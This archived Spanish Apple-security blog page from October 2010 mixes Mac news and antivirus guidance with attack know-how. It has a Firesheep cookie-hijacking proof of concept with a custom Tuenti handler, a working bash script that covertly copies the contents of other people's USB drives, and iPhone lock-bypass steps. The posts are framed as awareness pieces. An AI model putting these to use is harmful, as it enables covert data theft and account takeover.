Menú principal

domingo, 31 de octubre de 2010

Steve Jobs despreciaba las netbooks hasta MacBook Air

Para hoy, domingo por la tarde, os queremos dejar este interesante artículo de Gizmología [He arreglado la parte barata], donde Axel Marazzi trata con humor y sátira las declaraciones de Steve Jobs con que se refería a las netbooks a las que describió como “laptops baratas” con “pantallas de baja calidad” y "lentas a la hora de correr el software". Llegando a decir no eran buenas para nada.


No es la primera vez que Steve Jobs critica algo para luego convertirlo en un bombazo comercial, como ya le pasó con los Tablets PC para luego sacar iPad. Así es Steve Jobs, un visionario o, tal vez mejor, un Re-visionario que es capaz de adaptar propuestas que ha criticado para encajarlas en las necesidades de sus clientes...a buen precio.

Mac Pro: Actualiza el firmware de la bestia

Los últimos modelos de Mac Pro, que se han vendido desde mediados de este año, quizá hayan pasado desapercibidos entre el ruido que hacen toda la gama de equipos móviles de consumo de Apple. Los Mac Book Air, los iPhone, iPad e iPod Touch se han llevado todo el buzz de la compañía, pero una máquina que puede ir armada hasta con 12 núcleos merece un trato especial.

Para estos equipos, para los que se han vendido desde mediados de este año con Mac OS 10.6.4, Apple ha sacado una actualización del firmware ya que adolecía de dos fallos en el software cargado en él: El primer fallo generaba que, en determinadas circunstancias, no se solicitará la contraseña de arranque del sistema que debía de ser solicitada por el firmware. El segundo fallo se producía cuando en la red no había ningún servidor DHCP y el equipo estaba conectado por ethernet, ya que no aparecía el menú de arranque.

Estos dos fallos han sido solucionados en la actualización y, para aplicarse, deben seguirse con atención todos los pasos necesarios. Es decir, primero se debe ejecutar el software y esperar a que el equipo termine la instalación y se apague. Una vez apagado, se debe mantener apretado el botón de encendido hasta que el indicador de la luz parpadee o se escuche un tono largo. Una vez suceda eso se puede soltar el botón de encendido.

La instalación terminará con una pantalla gris con un logo de Apple y una barra de proceso. Cuando termine, el equipo Mac Pro arrancará normalmente. Este proceso puede durar varios minutos, así que no debes apagar el equipo durante todo ese proceso.

La actualización la puedes descargar de la siguiente URL: Descargar Mac Pro EFI Firmware Update 1.5 y tienes más información del proceso de actualización de firmware en el artículo de la web de soporte de Apple dedicado a estos procesos.

sábado, 30 de octubre de 2010

Manual de usuario de BitDefender para Mac OS X (2 de 4)

========================================================================
========================================================================

Módulo Scanner

El modulo ‘Scanner’ permite la detección y eliminación del malware residente en el equipo mediante perfíles de análisis configurados. Desde aquí es posible realizar escaneos programados a los volúmenes o ficheros que se deseen, así como crear un nuevo perfil de análisis y la ejecución bajo demanda de los mismos.

Figura 5: Perfiles disponibles

Entre los perfiles de escaneo están los siguientes: 'Home Scan','Quick System Scan','Custom Scan','Removable Devices Scan','Network Mount Scan','Full System Scan', 'Security Issue', 'Processes Scan'. Cada uno de ellos tiene una distinta configuración dentro de las pestañas de 'Targets' y 'Settings', es decir, cada uno realiza procesos de escaneos sobre distintas ubicaciones y toma distintas acciones ante la detección de malware o de ficheros sospechosos. Los resultados de la ejecución de cada uno de ellos se puede ver en la opción de 'Statistics' o accediendo a registro mediante el botón 'show log'.

Figura 6: Log relativo a la opción de Full System Scan

Creación de un perfil de escaneo personalizado:

Para configurar un perfil de escaner ajustado a las necesidades personales, se debe utilizar la opción de Custom Scan. Ahí, se deben elegir las opciones de objetivos, que no son nada más que las ubicaciones que se quieren revisar en busca de malware.

Figura 7: Selección personalizada de objetivos

Una vez elegidas las partes del sistema que se desean escanear, hay que determinar cual va a ser el comportamiento del motor en caso de detectar malware o un fichero sospechoso. Estas acciones se realizan desde la pestaña de 'Settings'.

Figura 8: Configuración de acciones a tomar

Planificación de escaneos:

Cada uno de los perfiles permite configurarse para realizar escaneos automatizados, ya sea diariamente, semanalmente o mensualmente. Esta opción está disponible, para cada perfil de escaneo en la pestaña de 'Scheduler'.

Figura 9: Planificación de tarea de escaneo

Es conveniente realizar un escaneo completo diaria o semanalmente, cuando el equipo vaya a estar encendido y con poca actividad y planificar escaneos rápidos diariamente o cada poco espacio de tiempo, para garantizar que la seguridad continua sin ninguna amenaza grave.

========================================================================
========================================================================

viernes, 29 de octubre de 2010

Robos de sesión mediante Firesheep: POC con Facebook y Tuenti

El término hijacking es empleado para definir la acción de realizar un ataque contra uno o más usuarios con la intención de recolectar cookies y así poder suplantar la identidad de dichos usuarios. En la gran mayoría de portales web, este ataque se puede llevar a cabo gracias a que no se hace un buen uso del protocolo SSL, sea por sencillez, ahorro de recursos, etcétera. Ya que una vez el usuario ha sido autenticado mediante el protocolo HTTPS, este pasa a continuar la conexión con el protocolo HTTP, por lo que todos los datos que se estén enviando viajaran en claro por la red.

A través de Cyberhades, pudimos leer como en la ToorCon 12 (Conferencia de seguridad informática) se publicó la extensión para Firefox Firesheep soportada en Windows y Mac OS X. La función de dicha extensión es básicamente la de escuchar todo el tráfico de nuestra interfaz y detectar cuando se están enviando cookies que puedan ser de interés para el usuario, mostrándolas por pantalla y de este modo dando la posibilidad de realizar suplantaciones de identidad de una forma sencilla e intuitiva.

Seguidamente se va a realizar una prueba de concepto para visualizar la sencillez de la extensión y el peligro de la misma. Descargamos el fichero desde el portal web de Firesheep. Podremos observar que se nos ha descargado un fichero en formato XPI, si arrastramos este a nuestro navegador Firefox, automáticamente se nos informará si deseamos instalar la extensión. Una vez instalada y reiniciado el navegar podremos observar la extensión en nuestro panel de Complementos.

Figura 1: Instalando Firesheep

Por defecto la extensión aparece como oculta, si deseamos interactuar con ella, es necesario dirigirnos a ‘Ver / Panel lateral / Firesheep’  y automáticamente aparecerá un panel en la banda izquierda del navegador que nos permitirá interactuar con Firesheep.

Figura 2: Plugin en Firefox

En la parte inferior del panel se podrá abrir la ventana de preferencias para configurar la extensión:

Figura 3: Configuración de Firesheep

- Capture: Permite indicar porque interfaz se va a escuchar el tráfico.

- Websites: Desde este módulo se podrá visualizar, añadir, editar, eliminar, importar y exportar las cookies que soporta la extensión. Desde el siguiente enlace (http://github.com/codebutler/firesheep/wiki/Handlers) se puede visualizar cuales son soportadas y cuáles serán soportadas en un futuro.

- Advanced: Permite configurar el protocolo y puerto que va a filtrar en busca de las cookies.

Para hacer funcionar la extensión y que empiece a capturar cookies únicamente bastará con pulsar sobre el botón Start Capturing, y esperar a que alguien realice alguna conexión a alguno de los portales web soportados.

Figura 4: Detección de cookie de Facebook

Una vez capturada una cookie de otro usuario, la propia extensión la añadirá al panel y ya podremos interactuar con el portal web que estaba visitando la víctima, haciéndonos pasar por él.

Figura 5: Acceso a cuenta de Facebook

Como ya se ha comentado anteriormente la extensión permite añadir portales que no estén soportados, Tuenti por ejemplo no se encuentra en la lista de soportados ni tampoco en los pendientes por añadir. Bastaría únicamente con dirigirte a la pestaña de añadir Add en la pestaña de Websites de Preferencias e introducir el script necesario para que detecte el portal web que deseemos.

El siguiente código es el ejemplo del código necesario para que la extensión detecte cookies de tuenti.

// Author: SeguridadApple - http://www.seguridadapple.com
// v2.0
register({
name: "Tuenti",
url: 'http://www.tuenti.com/',
domains: [ 'tuenti.com' ],
sessionCookieNames: [ 'sid' ],

identifyUser: function () {
var resp = this.httpGet(this.siteUrl);
this.userName = 'Tuenti User';
this.userAvatar = 'http://alt1040.com/files/2009/03/tuenti.jpg';
}
});

Una vez detectado una cookie de tuenti, nuestra extensión tendrá una apariencia similar a la siguiente.

Figura 6: Detección de cookie de Tuenti y acceso a cuenta

Hay que tener en cuenta que es necesario estar escuchando el canal para poder capturar las cookies de los usuarios. Conexiones cifradas como se puede encontrar en la tecnología Wifi (WPA, WPA2) será necesario acompañar a la extensión con un ataque MITM para interceptar todo el tráfico de la víctima. En escenarios con concentradores de conexiones HUB o redes WiFi abiertas, como pueden ser universidades, no será necesario realizar el ataque MITM, ya que todo el tráfico llega a nuestra máquina en texto claro.

Una solución rápida y eficaz sería la de aplicar extensiones a nuestros navegadores para que forzaran la navegación siempre que sea permitido por el protocolo Https. Esperamos que esta prueba de concepto os haya concienciado de lo importante que es una buena implementación del protocolo SSL en portales web donde se maneja gran cantidad de información privada y de no conectarte nunca a sitios privados desde redes inseguras.

Y otra vulnerabilidad crítica en los productos de Adobe {Adobe Flash Player, Adobe Acrobat y Acrobat Reader}

Si el viernes pasado nos hacíamos eco de una vulnerabilidad, con 0-day publicado y todo, para Adobe Shockwave Player para Windows, Linux y Mac OS, ahora Adobe acaba de confirmar que existe una vulnerabilidad crítica en el módulo authplay.dll que viene en todas las versiones de los tres productos citados, es decir, Adobe Flash Player, Adobe Acrobat y Acrobat Reader, en todas las versiones y para todas las plataformas.

Esta vulnerabilidad ha sido catalogada con el CVE-2010-3654 y está aún sin parchear, tal y como se encuentra la vulnerabilidad en Adobe Shockhwave Player de la semana pasada, que tiene el código CVE-2010-3653. Adobe ha confirmado en el expediente de seguridad APSA10-05 que es consciente de que está siendo explotada activamente y que el usuario debe tener precaución a la hora de abrir archivos de los que no conoce la procedencia y tiene garantías de que es seguro.

En el mismo expediente, Adobe ha confirmado que habrá un parche disponible para el día 9 de Noviembre, es decir, dentro de algo más de 10 días en el que se arreglarán dichas vulnerabilidades. Esto deja una ventana de tiempo durante la cual la industria del malware puede hacer uso de estas vulnerabilidades.

Hay que tener presente que, tras la confirmación de que malware como Koobface o Boonana, ha sido migrado a plataformas Mac OS X, es probable que los componentes de la botnet se sigan intentando introducir en las plataformas Mac a través de las nuevas vulnerabilidades que aparezcan. Hay que recordar que ya existen muchos exploits en los kits de explotación con "soporte" para sistemas Mac OS

jueves, 28 de octubre de 2010

Koobface llega a Mac OS X. Toca cambiar la Wikipedia

A día de hoy, en la entrada de la Wikipedia aún se puede leer que Koobface es un gusano que se distribuía a través de Facebook, pero que existía sólo para plataformas Microsoft Windows. Y esto ya no es así.


Koobface ha sido portado con relativo éxito también a las plataformas Mac OS X y, utilizando los mismos trucos, intenta infectar el equipo de la víctima. Así, desde Intego se ha confirmado el funcionamiento de este malware en plataformas Mac OS X. Para ello, una vez el usuario hace clic en un link de distribución del gusano, que suele ser para intentar visualizar algún tipo de vídeo curioso en las redes sociales, Koobface intenta ejecutarse mediante un applet, tal y como se puede ver en la imagen siguiente.

Viendo los detalles del applet se puede ver que es un componente auto-firmado que pretende dar garantías a una aplicación que se va a instalar en el equipo.


Si el usuario acepta la ejecución, Koobface comenzará la descarga de ficheros desde los servidores remotos que almacenará en la carpeta oculta .jnana dentro del home del usuario que ha aceptado la carpeta. Estos ficheros son los que instalarán el malware en la plataforma cliente para ejecutar un webserver y un servidor IRC que harán que la máquina forme parte de una botnet con la que el master puede activar muchas funciones.

De nuevo Java, de nuevo un malware multiplataforma y de nuevo las redes sociales, como en el caso de Boonana, lo que está dejando muy a las claras la necesidad de tomar precauciones seriamente contra el malware en los sistemas Mac OS X, como alertan también desde Spamloco.

Apple parcheará en iOS 4.2 el problema de llamar sin clave

El mundo de iPhone está medio enfadado con el fallo que permite realizar llamadas desde tu teléfono incluso aunque esté bloqueado con contraseña. Este fallo ha disparado las críticas ya que, para los "amigos de lo ajeno" es fácil asegurarse una llamada rápida con todos los dispositivos iPhone.

Al principio todo el mundo supusimos que podría tratarse de un hoax, pero tras comprobarlo personalmente, la preocupación subió en aumento y muchos buscaron la respuesta de Apple a este respecto. Y Apple tiene una respuesta oficial.

En Noviembre estará disponible iOS 4.2 y en esa versión vendrá arreglado este fallo, según ha confirmado CNET tras contactar con Apple. Aun no hay fecha oficial para el lanzamiento de iOS 4.2 y se espera que también venga solucionado el bug con el cambio horario que tantos problemas generó en los habitantes de Australia cuando pasaron de horario de verano a horario de invierno.

Artículos de Seguridad en iPhone en Español

En Seguridad Apple nos ha agradado ver como muchos de los principales blogs de seguridad informática han aportado en español conocimiento a temas relativos a la seguridad de los dispositivos iPhone. Esto hace que sea mucho más fácil la labor de aprender sobre estos temas. En este artículo os agrupamos algunos de los artículos en español que más nos han gustado relativos a la seguridad de los dispositivos iPhone.

Conexión Inversa

- Forensics en iPhone Parte I
- Forensics en iPhone Parte II

SecurityByDefault:

- Aplicaciones de Seguridad en iPhone
- Análisis Forense de mensajes en iPhone
- Como proteger las conexiones de tu iPhone
- Riesgos de seguridad en las aplicadiones de Cydia

Spamloco


Comunidad Dragonjar

- Jailbreak al iPhone 4, 3G, 3Gs o iPod Touch con iOS 4.1 con limera1n
Jailbreack al iPhone, iPod Touch con Firmware 4.1 y error al Restaurar

Cyberhades

Pregunta a Steve Wozniak en la Campus Party: “¿Tiene usted jailbreakeado su iPhone?
- Vídeollamadas gratis desde iPhone

Como podéis ver, hay material de primer nivel para poder aprender mucho sobre iPhone. Os recordamos que en Seguridad Apple también tienes disponibles algunos artículos relativos a iPhone:

- Configuración de OpenSSH en iPhone
- Aun con clave, cualquiera puede llamar desde tu iPhone
- Crackear claves con Aircrak para iPhone
- Jaibreak en iOS 4.0.2 ¿qué se puede hacer?
- RedSn0w, Jailbreak para iOS 4.1
- Un bug en iPhone que no te deja dormir
- GreenPois0n disponible para descarga

miércoles, 27 de octubre de 2010

Troyano Boonana atacando Mac OS X activamente

Boonana, así se llama el troyano que está atacando activamente a los Mac OS X y que se está distribuyendo a través del correo y de las redes sociales como Facebook o Twitter. El troyano comienza con un enlace simulando ser un vídeo en el que pone "is this you in this video?". Si la víctima hace clic en el enlace se comienzan a descargar ficheros Java para ejecutar un applet.

Cuando se ejecuta el apple descargado se lanza un instalar que modifica las configuraciones del sistema quitando contraseñas para que sea posible acceder a los ficheros desde fuera del ordenador. El troyano se ejecuta invisiblemente en background al iniciarse y periódicamente se conecta a los paneles de control para enviar la información robada a los usuarios. El troyano, al ser multiplataforma también tiene un módulo para Windows, pero en Mac OS X funciona hasta las versiones Snow Leopard (10.6). 

El uso de Java para distribuir malware masivamente, la existencia de los exploits para Mac OS X en los kits de explotación como Black Hole o Eleonore, el gran número de vulnerabilidades descubiertas en Mac OS X, la aun existente creencia de que en Mac OS X no hay malware por parte de muchos usuarios, junto con el progresivo aumento de cuota de Mac OS X y el cada día mayor tamaño de las mafias en Internet apuntaba hacia este tipo de malware.

Si tienes un Mac OS X, instala un antivirus, ten cuidado con donde haces clic, fortifica las configuraciones de tu sistema, y si no usas Java desactívalo de tu navegador porque estás en la lista de objetivos de la industria de malware. Tienes más información en Net-Security y SecureMac

Manual de usuario de BitDefender para Mac OS X (1 de 4)

========================================================================
- Manual de usuario de BitDefender para Mac OS X (1 de 4)
- Manual de usuario de BitDefender para Mac OS X (2 de 4)
- Manual de usuario de BitDefender para Mac OS X (3 de 4)
- Manual de usuario de BitDefender para Mac OS X (4 de 4)
========================================================================

Introducción

A pesar de que muchos usuarios piensan erróneamente que no existe malware para sistemas operativos Mac OS X, éstos si existen y la industria de seguridad informática hace tiempo que está preocupada. Por ello, es recomendable la utilización de una solución de antimalware también en los sistemas Mac OS X, como Bitdefender, el cual puede ser descargado desde la siguiente URL [Descargar BitDefender para Mac] e instalarlo, tal y como se detalla en este artículo sobre el proceso de instalación de BitDefender para Mac OS X. En este post de hoy vamos a ver las funcionalidades que ofrece el producto.

Módulos

El panel de configuración inicial se divide en 5 módulos principales desde los cuales se administra toda la configuración y seguridad que BitDefender proporciona. Junto a cada módulo se sitúa un icono informativo que indica si el módulo está activado y sin incidentes, como se puede ver en la imagen siguiente con el módulo Shield, si existe algún incidente como con el módulo Scanner de la imagen siguiente, o si existe algún mensaje informativo, como en el caso del módulo Registration.

Figura 1: Módulos de Bitdefender para Mac OS X

Módulo Shield

Este módulo proporciona Protección en tiempo real, realizando escaneos automáticos a todos ficheros a los que el usuario o las aplicaciones acceden, proporcionando de este modo un nivel de protección muy elevado. Es muy recomendable mantener este módulo activo.

La configuración de este módulo permite especificar las acciones a tomar contra las amenazas encontradas, permitiendo elegir entre 'Desinfectar', 'Mover a cuarentena', 'Bloquear acceso y notificar' o 'Borrar el fichero'. En caso de que esta acción no pueda llevarse a cabo se puede especificar una segunda acción. La desinfección se llevará a cabo siguiendo la base de conocimiento de Bitdefender, que permitirá eliminar completamente cualquier impacto que haya tenido la amenaza en el equipo.

Para los ficheros sospechosos, pero que no han sido catalogados como amenazas, también se pueden llevar acciones a cabo, permitiendo elegir entre las siguientes: 'Mover a cuarentena', 'Bloquear y notificar' o 'Borrar el fichero'.

Figura 2: Configuración de acciones en el módulo Shield

Bitdefender permite configurar el análisis de los ficheros comprimidos. Debido a que esto puede suponer un impacto en el rendimiento del equipo, se puede especificar un tamaño máximo de archivo a escanear y, si se quieren escanear todos los ficheros comprimidos sin importar su tamaño, establecer dicho valor a 0.

Desde este módulo es posible acceder a las estadísticas del módulo, donde se puede conocer que elementos han sido evaluados por el módulo de protección en tiempo real, tal y como se ve en la figura 3.

Figura 3: Estadísticas de la protección en tiempo real

Además, el módulo de protección en tiempo real muestra información de todas las amenazas descubiertas, así como las acciones aplicadas y el resultado de las mismas. Es conveniente revisar estos valores periódicamente para así descubrir puntos de infección a erradicar, como unidades USB externas, archivos intercambiados con determinados usuarios o páginas web maliciosas.

Figura 4: Amenazas descubiertas por el módulo de protección en tiempo real

========================================================================
========================================================================

martes, 26 de octubre de 2010

Aun con clave cualquiera puede llamar desde tu iPhone

Así de revuelto está el mundo Apple con la seguridad de iPhone ya que se ha descubierto que hay un sencillo método para saltarse la contraseña de iPhone y llamar a cualquiera. El método fue publicado en los foros de MacRumors y es tan sencillo como:

- Dar a la opción de llamadas de emergencia.
- Marcar cualquier número que no se de emergencia.
- Colgar inmediatamente.

Si el método ha funcionado se abrirá la aplicación de contactos y se podrá acceder a toda la información, llamar a contactos, etc... Esta vulnerabilidad ha sido reportada en las versiones de iOS 4.1, así que ten cuidado si estás pensando en actualizar, que tal vez convenga esperar a que Apple parchee este "pequeño" problema de seguridad. Si tienes la versión de tu iPhone actualizada a la iOS 4.1, entonces mejor no le quites el ojo a tú teléfono.

Aquí Tienes un vídeo de ejemplo hecho por Endgadget:


USB Dumping en Mac OS X

Una de las técnicas de robo de información de forma local es la llamada ‘USB Dumping’. Ésta técnica consiste en realizar un copiado de la información de cualquier dispositivo USB que se conecte a nuestro equipo, de forma totalmente transparente al usuario.

Éste tipo de ataques puede resultar útil en entornos de trabajo en los cuales un compañero te pide la impresión de un documento, y para ello te proporciona un pendrive en el cual está el documento a imprimir junto con un montón de datos que el usuario, descuidadamente, mantiene en el mismo dispositivo.

De este modo, al conectar el dispositivo USB para la impresión del documento, se estará produciendo un copiado al completo del contenido del disco y, aunque el propietario del pendrive esté atento a las acciones realizadas sobre el mismo, le será imposible detectar que se ha realizado una copia de toda su información. 

Desde Seguridad Apple hemos desarrollado un pequeño script que realiza esta tarea y que puedes tener corriendo siempre en tu sistema Mac OS X para ver que "cazas". Normalmente la gente suele mezclar en sus pendrives personales documentos de trabajo, datos de intercambio y cosas de alto nivel de intimidad. El código es el siguiente:
#!/bin/bash
#www.seguridadapple.com
function saveDefaultDevices()
{
rm -rf /tmp/usblist /tmp/Volumes
mkdir /tmp/Volumes
for vol in /Volumes/*
do
echo $vol >> /tmp/usblist
echo "Detecting $vol as default"
done
}
function checkDevices()
{
for vol in /Volumes/*
do
aux=`cat /tmp/usblist |grep -i "$vol"`
aux=`echo $?`
if [ $aux -eq 1 ]; then
echo $vol >> /tmp/usblist
mkdir "/tmp$vol"
echo "[+] Dumping $vol in /tmp$vol"
sleep 1
cp -R "$vol" "/tmp/Volumes/"
echo "[+] Done"
fi
done
}
saveDefaultDevices
while [ 1 ]; do
checkDevices
sleep 1
done
El funcionamiento del script es muy sencillo. Únicamente es necesario ejecutarlo mediante el comando ‘sh usb.sh’, y esperar a que se introduzca un nuevo dispositivo USB. Será en este momento en el cual el script detectará su presencia y comenzará a realizar su volcado en el directorio "/tmp/Volumes/".


Como se ve en las capturas de pantalla, tras realizarse el volcado de “/Volumes/Untitled”, se puede acceder a su contenido copiado en ”/tmp/Volumes/Untitled/


Ten mucho cuidado donde pinchas un pendrive ya que el peligro no es sólo que se infecte, sino que te roben todos los datos que en él tengas sin que te des cuenta.

lunes, 25 de octubre de 2010

Conexión RDP desde Mac OS X a sistemas Windows

El protocolo RDP (Remote Desktop Protocol) es un sistema desarrollado por Microsoft que permite la conexión contra terminales Windows. Por ello, Microsoft ha desarrollado una aplicación RDP cliente para los sistemas operativos Mac OS X desde el cual es posible la realización de conexiones contra sistemas operativos de la casa de Microsoft. Si eres un usuario experto, sabrás como hacerlo funcionar, pero para los usuarios menos avanzados, aquí va un sencillo Step-by-Step.

Activar el escritorio remoto en Windows

Para probar la funcionalidad, antes de nada es necesario habilitar el acceso remoto en el sistema Windows en la pestaña ‘Acceso remoto’ en las 'Propiedades del Sistema', activando el checkbox ‘Permitir conexiones de asistencia remota a este equipo’.


En las opciones avanzadas se puede cambiar el puerto de conexión, que deberá especificarse a la hora de conectarse. Una vez instalada la herramienta cliente en Mac OS X, únicamente es necesario ejecutar la aplicación e introducir la dirección IP del equipo Windows. Si se ha cambiado el puerto, este deberá especificarse detrás de la dirección IP, es decir IP:PUERTO. Si vas a tener habilitado siempre el escritorio remoto, tal vez sea una buena idea cambiar este puerto para evitar visitantes curiosos.


Tras introducir las credenciales del equipo remoto, se nos abrirá la terminal desde la cual ya podremos administrar el sistema Windows desde el Mac OS X.


En los siguientes artículos veremos cómo realizar conexiones de escritorio remoto desde Windows-Mac y Mac-Mac utilizando VNC y securizando las conexiones. Recuerda deshabilitar el escritorio remoto en tu máquina Windows cuando acabes el trabajo para evitar atacantes curiosos que escanean redes.

domingo, 24 de octubre de 2010

Fue noticia en Seguridad Apple: del 11 al 24 de Octubre

Como cada 2 Domingo se realiza el resumen quincenal de la actualidad en el mundo de la seguridad Apple. Los últimos 15 días han traído consigo bastante noticias interesantes en el mundo de la seguridad, las cuales se repasarán en las siguientes líneas.

Esta es la lista de artículos publicados durante estos 15 días, desde el 11 de Octubre hasta el 24 de Octubre.

El día 11 de Octubre se comenzaba la semana con noticias relativas al retraso hasta nuevo aviso de Greenpois0n, uno de los jailbreak más esperados de los últimos tiempos. Además se encontraba un bug en el iPhone con la actualización horaria en Australia, una noticia de lo más curiosa ya que generó las quejas de los usuarios al perder la programación de alertas y recibir alertas una hora antes. Por último, ese mismo día se publicó un artículo técnico sobre como navegar de forma anónima con la red TOR.

El día 12 de Octubre se publicaba un artículo acerca del kit de exploits denominado Eleonore. Este kit presenta un gran número de exploits para utilizar en Mac OS, así como para otros sistemas operativos, pero sobre todo confirma el incipiente interés de la industria del malware en esta plataforma.

El día 13 de Octubre por fin se publicó Greenpois0n. Se tiene disponible tanto la versión para sistemas operativos Mac OS X como la versión para sistemas operativos Microsoft Windows lista para descarga.

¿Cómo no registrar nuestra dirección IP en nuestra navegación? El día 14 de Octubre se publicó un artículo técnico sobre proxifier, una pequeña herramienta que ayuda a proxificar herramientas del sistema operativo Mac OS X que no soporten la opción de servidor proxy.

El día 15 de Octubre, nos despertamos con una grata noticia, Seguridad Apple se encontraba dentro de la lista de los premios bitácoras, todo un honor para todo el equipo de Seguridad Apple. Además, ese mismo día, nos hicimos eco de una curiosidad sobre Steve Wozniak, ya que éste aparece en la serie de televisión Big Bang Theory.

El día 16 de Octubre se publicó un nuevo artículo sobre la historia de Mac OS, en esta ocasión la cuarta entrega con Mac OS 4.0.

Una de las cosas que en Informática 64 siempre se ha perseguido e investigado es el tema de los metadatos, fuga de información que se puede controlar. El día 17 de Octubre se publicó un interesante artículo acerca de este tema en Mac OS X. ¿Controlas los metadatos de tus ficheros ofimáticos?

El día 18 de Octubre, se publica una prueba de concepto acerca del 0-day de path transversal en ZipEg para Mac OS. En el artículo se puede observar qué es y cómo funciona, paso a paso, la explotación de esta vulnerabilidad

El día 19 de Octubre se publica una noticia acerca de JAVA. Mediante el uso de exploits Java se está   distribuyendo masivamente malware.Sobretodo, la sorpresa viene dada porque se usa más JAVA que Adobe para este fin.

El día 20 de Octubre se publica la traducción de una entrevista realizada a posixninja, miembro del Chronic Dev Team, los desarrolladores de Greenpois0n. Interesante entrevista a este joven hacker.

El día 21 de Octubre se publica un artículo técnico sobre el uso de la herramienta netstat en Mac OS X. Con esta herramienta se puede visualizar las distintas conexiones que un usuario tiene en su equipo y el estado de éstas. Para que conozcas lo quue pasa en tu ordenador personal.

El día 22 de Octubre, para finalizar la semana y comenzar el fin de semana, se sorprende con una nueva vulnerabilidad de Adobe, un nuevo 0-day para el equipo de Adobe Shockwave Flash. Para relajar el viernes, un artículo sobre que siguen llegando ejemplos de ataques David Hasselhoff. Se sigue viendo como el ataque David Hasselhoff sigue estando de moda.

El sábado, día 23 de Octubre  se publica un artículo sobre la actitud de Steve Jobs y Apple hacia Java, que ha sido marcada como tecnología deprecated. Y, para terminar, una noticia humorística sobre lo que no hacer con Mac cuando estés con tu pareja.

sábado, 23 de octubre de 2010

Amas tu Mac, pero esto puede ser peligroso

Foto realizada por profesionales, no lo hagas en casa

Desde Seguridad Apple te recomendamos encarecidamente que, aunque estés muy enamorado de tu Mac, no se te ocurra realizar algo parecido. Se conocen experiencias similares en las que alguien ha mirado su iPhone justo después, y no durante, y el protagonista ha sufrido serias lesiones. Puede ser peligroso para tu integridad física realizar algo similar a esto. 

Java deprecated... ¿por seguridad?

Tras las tiranteces públicas que tantos ríos de tinta han generado entre Apple con la compañía Adobe por la tecnología Flash en los dispositivos iPhone, iPad e iPod Touch, parece que la próxima tecnología que se encuentra en la lista "negra" de Steve Jobs es Java. Por todos es conocido que a Apple no le gusta tener que depender de terceros para gestionar la evolución de sus tecnologías y el ciclo de vida de Java se encuentra fuera de sus dominios.

Utilizar Java en sus dispositivos implica no controlar totalmente la evolución de la tecnología por lo que Apple ha marcado ya a Java como una tecnología deprecated, es decir, a extinguir.

"As of the release of Java for Mac OS X 10.6 Update 3, the version of Java that is ported by Apple, and that ships with Mac OS X, is deprecated.

This means that the Apple-produced runtime will not be maintained at the same level, and may be removed from future versions of Mac OS X. The Java runtime shipping in Mac OS X 10.6 Snow Leopard, and Mac OS X 10.5 Leopard, will continue to be supported and maintained through the standard support cycles of those products."

O lo que viene siendo lo mismo, que en el futuro no cuentan con esta tecnología. Lo más seguro es que Steve Jobs quiera librarse de cualquier tecnología en sus dispositivos que no controle directamente Apple y tal vez el creciente número de ataques generados por vulnerabilidades en esta tecnología sea una buena excusa. Para apuntalar este argumento, el propio Steve Jobs ha confirmado que la decisión ha sido tomada porque Oracle lleva siempre sus propias fechas de lanzamiento y esto hace que Apple tenga que ir siempre un paso por detrás, lo que no es lo mejor opción.

Mientras tanto, Apple ha publicado sendas actualizaciones de seguridad para Java en Mac OS X 10.5 y Mac OS X 10.6 que arreglan un buen número de vulnerabilidades así que, ya sea por la opción de Software Update, o descargando directamente las actualizaciones, se deben instalar lo antes posible.

viernes, 22 de octubre de 2010

Los usuarios Mac siguen sufriendo a David Hasselhoff

Como hoy es viernes, y a ciertas horas Internet es para otras cosas más que para trabajar, vamos a contaros una historia un poco más distendida. En este caso tenemos la historia de otra víctima del ataque David Hasselhoff para que aprenda que hay que bloquear las sesiones del ordenador cuando te ausentas de tu equipo.

MariaSerBen ha sido "Davidahasselhoffeada" por su "amigo" Juandoscuartos y, para que quede constancia, tal y como ya ha pasado con anterioridad, ha sido publicado en twitter y subida a Internet la foto del momento en que descubre la penetrante mirada de David clavada en ella.


Para centralizar a todos los que han sido aleccionados por medio de El ataque David Hasselhoff, se ha creado una página en Facebook en la que puedes enterarte de quién ha sido "enseñado por las malas" y en la que puedes subir las fotos de todos aquellos a los que hayas aplicado la medicina Hasselhoff.



¿Es o no es sexy la pose de mister David? ¡Protege tu Mac!

Nuevo Exploit 0day para Adobe Shockwave Player

Quizá por lo repetitivo de la noticia pueda parecer que es un titular antiguo, pero no es así, es un nuevo exploit para Adobe Shockware Player que fue publicado por Abyssec.

Los detalles que se han ofrecido en la publicación de esta vulnerabilidad son muchos, en el propio expediente se confirma que la vulnerabilidad es explotable en todas las versiones de Abobe Shockwave Flash Player y se ha puesto disponible un código de ejemplo para explotarlo en Windows XP SP3, junto con los binarios necesarios para probarlo. Es decir, cualquiera puede descargar el exploit desde la siguiente URL [Exploit & Analysis].

Es probable que este exploit esté ya siendo incorporado a los kits de explotación, como Eleonore o Black Hole, para que dentro de poco sea una nueva puerta para la entrada de malware en los sistemas. Hay que recordar que estas vulnerabilidades de los visores que se cargan en los navegadores de Internet son del tipo "Browse and get Infected",  o lo que es lo mismo, que para infectarse basta con navegar por una página web que tenga este exploit. Actualmente no se ha hecho público un exploit funcional para plataforma Mac OS X, pero desde Abobe se ha confirmado en el expediente de seguridad APSA10-04 que esta vulnerabilidad, catalogada como crítica con el código CVE-2010-3653, afecta también a los sistemas Macintosh.

Parece ser que otra vez, Steve Jobs, que este jueves se va a encontrar con el presidente Obama para hablar de economía y tecnología, encuentra nuevos argumentos para seguir en su idea de quitar las tecnologías inseguras de sus plataformas. Así, los usuarios del recientemente lanzado MacBook Air confirman que viene sin tener cargado Shockwave Flash en él.

jueves, 21 de octubre de 2010

Revisar las conexiones de red en Mac OS X con Netstat

Uno de los aspectos necesarios para el mantenimiento de un ordenador seguro es la revisión del funcionamiento del equipo. Entre los puntos a revisar, las conexiones de red que está realizando un equipo pueden ayudar a entender un determinado comportamiento o detectar una conexión no deseada del equipo.

Para conocer los parámetros de las conexiones, es decir, puertos, protocolos, o servicios que se encuentran levantados e interactuando directamente con la red se puede utilizar un comando del sistema llamado netstat. Los usuarios avanzados de los sistemas Mac OS X conocerán sobradamente su funcionamiento, pero si eres un usuario de Mac OS que has tenido poca experiencia en comunicaciones, este artículo te puede ayudar.

El comando Netstat en Mac OS X

Netstat es el comando encargado de dar toda la información acerca de las conexiones que el sistema operativo está realizando en tiempo real y qué protocolos, puertos y servicios están detrás de ellas. Basta con ejecutar el siguiente comando en una consola en del sistema operativo Mac OS X y se obtendrá la ayuda necesaria para empezar a utilizar esta aplicación.


Figura 1: El comando netstat –h muestra los parámetros de uso

